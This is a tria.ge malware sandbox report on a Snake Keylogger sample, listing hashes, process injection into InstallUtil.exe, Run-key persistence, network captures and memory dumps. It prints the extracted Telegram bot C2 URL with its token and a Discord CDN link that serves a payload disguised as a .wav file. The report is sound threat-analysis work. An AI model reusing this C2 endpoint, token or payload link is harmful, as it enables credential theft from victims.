Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

Uecqyndauhl.exe

windows7-x64

10

Uecqyndauhl.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    123s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    29/08/2023, 12:01 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Uecqyndauhl.exe

  • Size

    837KB

  • MD5

    7af8d321a3c0d9a27f7a9ab29ad5b16a

  • SHA1

    29e56ec4934fab9865fbd4d41698840fefd8b33d

  • SHA256

    8f0f73da0cf00759da7bdb027e9f33abfd04617d19ec3d574901b1eb36e21078

  • SHA512

    9f8b8f7be56ed8721c4a21f7fffc82b0f8a592f7b3871f55191a9355f6e8c838a8c6e7c61ef12ae4334445a3617250741ad24f42b276062bc368832eabad2a04

  • SSDEEP

    12288:b/y7FGqvrNujgr+w6u17Xh6uROvKDGSIlQVSjZfQg4lToURIUh9mJRJPZ6JvC7R6:ruGq0grx16uYvKslQERJ7PAqN7

Score
10/10
snakekeyloggerkeyloggerpersistencestealer

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot5651670986:AAHpwwN-ny7apM0yBwQlweVd-JZOihDUBEA/sendMessage?chat_id=5716598986

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Uecqyndauhl.exe
    "C:\Users\Admin\AppData\Local\Temp\Uecqyndauhl.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:880

Network

  • flag-us
    DNS
    cdn.discordapp.com
    Uecqyndauhl.exe
    Remote address:
    8.8.8.8:53
    Request
    cdn.discordapp.com
    IN A
    Response
    cdn.discordapp.com
    IN A
    162.159.129.233
    cdn.discordapp.com
    IN A
    162.159.134.233
    cdn.discordapp.com
    IN A
    162.159.135.233
    cdn.discordapp.com
    IN A
    162.159.133.233
    cdn.discordapp.com
    IN A
    162.159.130.233
  • flag-us
    GET
    https://cdn.discordapp.com/attachments/1144221464405491825/1145979467194449952/Oxulappwk.wav
    Uecqyndauhl.exe
    Remote address:
    162.159.129.233:443
    Request
    GET /attachments/1144221464405491825/1145979467194449952/Oxulappwk.wav HTTP/1.1
    Host: cdn.discordapp.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 29 Aug 2023 12:01:14 GMT
    Content-Type: audio/x-wav
    Content-Length: 749056
    Connection: keep-alive
    CF-Ray: 7fe4a3624e6cb734-AMS
    CF-Cache-Status: MISS
    Accept-Ranges: bytes
    Cache-Control: public, max-age=31536000
    Content-Disposition: attachment; filename="Oxulappwk.wav"
    ETag: "7a7c8752c4d85672984f8785e5b25cf7"
    Expires: Wed, 28 Aug 2024 12:01:14 GMT
    Last-Modified: Tue, 29 Aug 2023 07:13:16 GMT
    Vary: Accept-Encoding
    Alt-Svc: h3=":443"; ma=86400
    x-goog-generation: 1693293196315684
    x-goog-hash: crc32c=rJlRUA==
    x-goog-hash: md5=enyHUsTYVnKYT4eF5bJc9w==
    x-goog-metageneration: 1
    x-goog-storage-class: STANDARD
    x-goog-stored-content-encoding: identity
    x-goog-stored-content-length: 749056
    X-GUploader-UploadID: ADPycdv5-8-U4SPm4dNSO_F--pDdiXtixVGu7pYKFj-HnvHhwGnjMLBRdkW7EH1vtDo4e5coYZC2hxCAy4JdyJI9PGar3_AgVokh
    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
    Set-Cookie: __cf_bm=KIKEwRp38zaBQAG2y6YysvrrYtEjuQB7goaDUmIVTng-1693310474-0-AZu+yzIV+HJ6Z/Eik9eZlwhDlkTmATdRY/+TLVsbh/uGEAeDx+I0FbLkQcc9EO3YKcVwrIvoWHIYBkdAy6Pl/9s=; path=/; expires=Tue, 29-Aug-23 12:31:14 GMT; domain=.discordapp.com; HttpOnly; Secure
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eFOVBciXTtZ0J9yjGSrRsz4pLTZC8DQaxvvENvM39H1s4KYzXmBfZfkCT%2BCl7YL1E52%2Fbkl4oyh6oG9uptOQZRiH%2FDl02GBCnZmAdV3b5QDjJoHLP1FpHGXTEo5%2ByOF7v%2FK%2FKA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
  • flag-us
    DNS
    checkip.dyndns.org
    InstallUtil.exe
    Remote address:
    8.8.8.8:53
    Request
    checkip.dyndns.org
    IN A
    Response
    checkip.dyndns.org
    IN CNAME
    checkip.dyndns.com
    checkip.dyndns.com
    IN A
    132.226.247.73
    checkip.dyndns.com
    IN A
    193.122.6.168
    checkip.dyndns.com
    IN A
    132.226.8.169
    checkip.dyndns.com
    IN A
    158.101.44.242
    checkip.dyndns.com
    IN A
    193.122.130.0
  • flag-de
    GET
    http://checkip.dyndns.org/
    InstallUtil.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 29 Aug 2023 12:02:47 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-us
    DNS
    api.telegram.org
    InstallUtil.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • 162.159.129.233:443
    https://cdn.discordapp.com/attachments/1144221464405491825/1145979467194449952/Oxulappwk.wav
    tls, http
    Uecqyndauhl.exe
    15.8kB
     781.4kB
     335
    619

    HTTP Request

    GET https://cdn.discordapp.com/attachments/1144221464405491825/1145979467194449952/Oxulappwk.wav

    HTTP Response

    200
  • 132.226.247.73:80
    checkip.dyndns.org
    InstallUtil.exe
    152 B
     3
  • 193.122.6.168:80
    http://checkip.dyndns.org/
    http
    InstallUtil.exe
    387 B
     718 B
     5
    4

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200
  • 149.154.167.220:443
    api.telegram.org
    tls
    InstallUtil.exe
    388 B
     219 B
     5
    5
  • 8.8.8.8:53
    cdn.discordapp.com
    dns
    Uecqyndauhl.exe
    64 B
     144 B
     1
    1

    DNS Request

    cdn.discordapp.com

    DNS Response

    162.159.129.233
    162.159.134.233
    162.159.135.233
    162.159.133.233
    162.159.130.233

  • 8.8.8.8:53
    checkip.dyndns.org
    dns
    InstallUtil.exe
    64 B
     176 B
     1
    1

    DNS Request

    checkip.dyndns.org

    DNS Response

    132.226.247.73
    193.122.6.168
    132.226.8.169
    158.101.44.242
    193.122.130.0

  • 8.8.8.8:53
    api.telegram.org
    dns
    InstallUtil.exe
    62 B
     78 B
     1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/880-1094-0x0000000140000000-0x0000000140022000-memory.dmp

    Filesize

    136KB

    Download

  • memory/880-1099-0x000000001BC10000-0x000000001BC90000-memory.dmp

    Filesize

    512KB

    Download

  • memory/880-1098-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/880-1097-0x000000001BC10000-0x000000001BC90000-memory.dmp

    Filesize

    512KB

    Download

  • memory/880-1096-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2512-43-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-45-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-9-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-11-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-13-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-15-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-19-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-17-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-21-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-23-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-27-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-25-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-31-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-29-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-35-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-37-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-33-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-47-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-41-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-0-0x0000000000FA0000-0x0000000001074000-memory.dmp

    Filesize

    848KB

    Download

  • memory/2512-7-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-49-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-39-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-51-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-53-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-55-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-57-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-59-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-61-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-63-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-65-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-67-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-543-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2512-642-0x000000001C1B0000-0x000000001C230000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2512-1082-0x0000000000580000-0x0000000000581000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2512-1083-0x00000000007A0000-0x00000000007D8000-memory.dmp

    Filesize

    224KB

    Download

  • memory/2512-1084-0x0000000000E40000-0x0000000000E8C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2512-1095-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2512-5-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-4-0x000000001FDF0000-0x000000001FEA7000-memory.dmp

    Filesize

    732KB

    Download

  • memory/2512-3-0x000000001FDF0000-0x000000001FEAE000-memory.dmp

    Filesize

    760KB

    Download

  • memory/2512-2-0x000000001C1B0000-0x000000001C230000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2512-1-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

    Filesize

    9.9MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.